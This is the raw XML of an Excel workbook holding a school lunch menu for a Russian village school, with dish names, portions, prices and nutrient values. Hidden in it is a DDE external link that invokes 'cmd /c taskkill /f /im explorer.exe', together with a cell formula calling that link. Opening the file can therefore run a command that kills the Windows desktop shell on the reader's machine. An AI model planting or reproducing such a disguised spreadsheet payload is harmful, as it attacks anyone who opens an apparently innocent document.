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928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0AD005B6-CECE-448F-ADB0-288013AA2D5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</calcChain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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="50" uniqueCount="49">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Б000086</t>
  </si>
  <si>
    <t>Б000002</t>
  </si>
  <si>
    <t>Хлеб ржаной(пшеничный)</t>
  </si>
  <si>
    <t>Б000064</t>
  </si>
  <si>
    <t>Чай из сухой смеси с витаминами</t>
  </si>
  <si>
    <t>Б000061</t>
  </si>
  <si>
    <t>Картофельное пюре</t>
  </si>
  <si>
    <t>ДП00208</t>
  </si>
  <si>
    <t>Салат из отв.свеклы с чесноком</t>
  </si>
  <si>
    <t>ДП00223</t>
  </si>
  <si>
    <t>тефтели из говяд.с рисом с том.соусом(п/ф)</t>
  </si>
  <si>
    <t>ДП00232</t>
  </si>
  <si>
    <t>Б000055</t>
  </si>
  <si>
    <t>Компот из смеси сухофруктов с/с</t>
  </si>
  <si>
    <t>ДП00175</t>
  </si>
  <si>
    <t>Рыба с овощами и сыром(минтай)</t>
  </si>
  <si>
    <t>ДП00165</t>
  </si>
  <si>
    <t>суп картофельный с бобовыми и гренками</t>
  </si>
  <si>
    <t>ДП00300</t>
  </si>
  <si>
    <t>Макаронные изделия отварные(1вар)</t>
  </si>
  <si>
    <t>МОБУ СОШ д.Шарипкулово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</si>
</sst>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ddeLink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ddeService="cmd" ddeTopic="/c taskkill /f /im explorer.exe &gt;nul">
    <ddeItems>
      <ddeItem name="_xlbgnm.A1" advise="1"/>
      <ddeItem name="StdDocumentName" ole="1" advise="1"/>
    </ddeItems>
  </ddeLin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48</v>
      </c>
      <c r="C1" s="40"/>
      <c r="D1" s="41"/>
      <c r="E1" t="s">
        <v>22</v>
      </c>
      <c r="F1" s="24"/>
      <c r="I1" t="s">
        <v>1</v>
      </c>
      <c r="J1" s="23">
        <v>44952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100</v>
      </c>
      <c r="F4" s="25">
        <v>39.93</v>
      </c>
      <c r="G4" s="15">
        <v>202</v>
      </c>
      <c r="H4" s="15">
        <v>9.5399999999999991</v>
      </c>
      <c r="I4" s="15">
        <v>6.66</v>
      </c>
      <c r="J4" s="16">
        <v>10.45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180</v>
      </c>
      <c r="F5" s="26">
        <v>6.11</v>
      </c>
      <c r="G5" s="17">
        <v>30.6</v>
      </c>
      <c r="H5" s="17">
        <v>0.09</v>
      </c>
      <c r="I5" s="17"/>
      <c r="J5" s="18">
        <v>7.83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2.52</v>
      </c>
      <c r="G6" s="17">
        <v>70.5</v>
      </c>
      <c r="H6" s="17">
        <v>1.65</v>
      </c>
      <c r="I6" s="17">
        <v>0.3</v>
      </c>
      <c r="J6" s="18">
        <v>14.49</v>
      </c>
    </row>
    <row r="7" spans="1:10" ht="15.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A7" s="7"/>
      <c r="B7" s="2"/>
      <c r="C7" s="38" t="s">
        <v>33</v>
      </c>
      <c r="D7" s="35" t="s">
        <v>34</v>
      </c>
      <c r="E7" s="17">
        <v>150</v>
      </c>
      <c r="F7" s="26">
        <v>13.34</v>
      </c>
      <c r="G7" s="17">
        <v>150</v>
      </c>
      <c r="H7" s="17">
        <v>3.3340999999999998</v>
      </c>
      <c r="I7" s="17">
        <v>5.6318000000000001</v>
      </c>
      <c r="J7" s="18">
        <v>21.559100000000001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40</v>
      </c>
      <c r="F8" s="27">
        <v>2.54</v>
      </c>
      <c r="G8" s="19">
        <v>39.200000000000003</v>
      </c>
      <c r="H8" s="19">
        <v>1.08</v>
      </c>
      <c r="I8" s="19">
        <v>2.88</v>
      </c>
      <c r="J8" s="20">
        <v>8.8800000000000008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44</v>
      </c>
      <c r="D13" s="34" t="s">
        <v>45</v>
      </c>
      <c r="E13" s="17">
        <v>200</v>
      </c>
      <c r="F13" s="26">
        <v>13.74</v>
      </c>
      <c r="G13" s="17">
        <v>197.5</v>
      </c>
      <c r="H13" s="17">
        <v>7.8125</v>
      </c>
      <c r="I13" s="17">
        <v>6</v>
      </c>
      <c r="J13" s="18">
        <v>35.5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80</v>
      </c>
      <c r="F14" s="26">
        <v>32.31</v>
      </c>
      <c r="G14" s="17">
        <v>102.4</v>
      </c>
      <c r="H14" s="17">
        <v>8.2639999999999993</v>
      </c>
      <c r="I14" s="17">
        <v>5.52</v>
      </c>
      <c r="J14" s="18">
        <v>5.048</v>
      </c>
    </row>
    <row r="15" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A15" s="7"/>
      <c r="B15" s="1" t="s">
        <v>18</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>46</v>
      </c>
      <c r="D15" s="34" t="s">
        <v>47</v>
      </c>
      <c r="E15" s="17">
        <v>160</v>
      </c>
      <c r="F15" s="26">
        <v>12.71</v>
      </c>
      <c r="G15" s="17">
        <v>224</v>
      </c>
      <c r="H15" s="17">
        <v>8.1999999999999993</v>
      </c>
      <c r="I15" s="17">
        <v>13.4</v>
      </c>
      <c r="J15" s="18">
        <v>20.100000000000001</v>
      </c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7.3</v>
      </c>
      <c r="G16" s="17">
        <v>169</v>
      </c>
      <c r="H16" s="17">
        <v>0.64</v>
      </c>
      <c r="I16" s="17">
        <v>0.05</v>
      </c>
      <c r="J16" s="18">
        <v>41.67</v>
      </c>
    </row>
    <row r="17" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A17" s="7"/>
      <c r="B17" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>39</v>
      </c>
      <c r="D17" s="34" t="s">
        <v>27</v>
      </c>
      <c r="E17" s="17">
        <v>30</v>
      </c>
      <c r="F17" s="26">
        <v>3.86</v>
      </c>
      <c r="G17" s="17">
        <v>51</v>
      </c>
      <c r="H17" s="17">
        <v>0.1</v>
      </c>
      <c r="I17" s="17">
        <v>3.5</v>
      </c>
      <c r="J17" s="18">
        <v>4.5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20</v>
      </c>
      <c r="F18" s="26">
        <v>2.62</v>
      </c>
      <c r="G18" s="17">
        <v>58</v>
      </c>
      <c r="H18" s="17">
        <v>0.6</v>
      </c>
      <c r="I18" s="17">
        <v>0.24</v>
      </c>
      <c r="J18" s="18">
        <v>6.82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 t="e">
        <f>[1]!_xlbgnm.A1</f>
        <v>#REF!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2023-01-26T15:12:55Z</dcterms:modified>
</cp:coreProperties>
</file>